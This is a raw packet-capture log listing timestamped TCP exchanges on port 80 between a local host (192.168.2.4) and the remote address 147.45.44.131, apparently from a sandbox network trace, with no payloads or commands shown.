Jan 1, 2025 08:54:02.832905054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.832915068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.832916021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.832926035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.832936049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.832937002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.832959890 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.832978964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833446026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833456039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833466053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833477974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833496094 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833523989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833642960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833652020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833662033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833673000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833683014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833693027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833699942 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833709002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833719969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833729029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833730936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833740950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833750963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833775043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833781958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833800077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833806992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833810091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833822012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833827972 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833832026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833842993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.833856106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.833893061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834467888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834479094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834487915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834498882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834516048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834547043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834624052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834635973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834645987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834656000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834665060 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834666014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834681034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834685087 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834698915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834714890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834722042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834726095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834738016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834743023 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834749937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834760904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834764957 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834772110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834783077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834791899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834796906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834803104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834815025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.834822893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834839106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.834858894 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835480928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835598946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835609913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835619926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835630894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835639954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835645914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835656881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835664034 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835668087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835679054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835689068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835699081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835707903 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835707903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835719109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835727930 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835730076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835747957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835748911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835760117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835764885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835772991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835783005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835793972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.835802078 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.835822105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.836272955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.836313963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928397894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928432941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928443909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928489923 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928528070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928539991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928550959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928572893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928586960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928723097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928734064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928745031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928755999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928762913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928769112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928781033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.928793907 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.928818941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929006100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929018021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929028034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929047108 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929240942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929251909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929269075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929280043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929286003 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929290056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929301977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929311037 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929312944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929325104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929331064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929337978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929347992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929349899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929358959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929369926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929379940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929383993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929397106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929408073 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.929976940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.929987907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930002928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930012941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930022955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930032969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930036068 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930044889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930056095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930067062 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930069923 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930083036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930119991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930131912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930141926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930144072 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930152893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930162907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930169106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930176020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930188894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930200100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930227041 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930804968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930815935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930834055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930844069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930846930 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930855989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930862904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930867910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930879116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930888891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930895090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930900097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930910110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930921078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930922031 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930932045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930942059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930947065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930953026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930963993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930977106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.930980921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.930993080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931001902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931005001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931016922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931022882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931029081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931055069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931782007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931801081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931811094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931821108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931832075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931840897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931850910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931852102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931864977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931871891 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931875944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931888103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931896925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931900978 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931909084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931919098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931926966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931930065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931941986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931948900 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931952953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931963921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931968927 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.931974888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.931992054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932003021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932010889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932034969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932693005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932715893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932727098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932737112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932739019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932748079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932758093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932760000 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932769060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932780027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932787895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932790995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932802916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932807922 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932815075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932826042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932836056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932837009 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932847977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932857990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932868004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932869911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932879925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932890892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932898045 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932903051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932914019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.932917118 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.932940006 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.933490992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.933502913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.933511972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.933532000 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.933562040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.013859987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.013879061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.013889074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.013938904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.013941050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.013998985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014003038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014014959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014025927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014072895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014228106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014239073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014250040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014261007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014271021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014276981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014302015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014375925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014391899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014426947 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014530897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014542103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014553070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014561892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014573097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014583111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014586926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014600039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014604092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014616013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014624119 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014627934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014663935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.014869928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014883041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.014925957 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015016079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015026093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015038013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015054941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015058041 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015067101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015078068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015079021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015089035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015100002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015110016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015111923 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015122890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015135050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015163898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015192986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015471935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015675068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015686989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015697956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015707970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015722990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015728951 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015733957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015744925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015744925 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015755892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015765905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015770912 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015774965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015789986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015794039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015809059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015819073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015830040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015831947 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015841007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015851021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015853882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015862942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.015889883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.015911102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016499996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016510010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016520023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016530991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016546011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.016555071 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.016556978 CET	80	49730	147.45.44.131	192.168.2.4
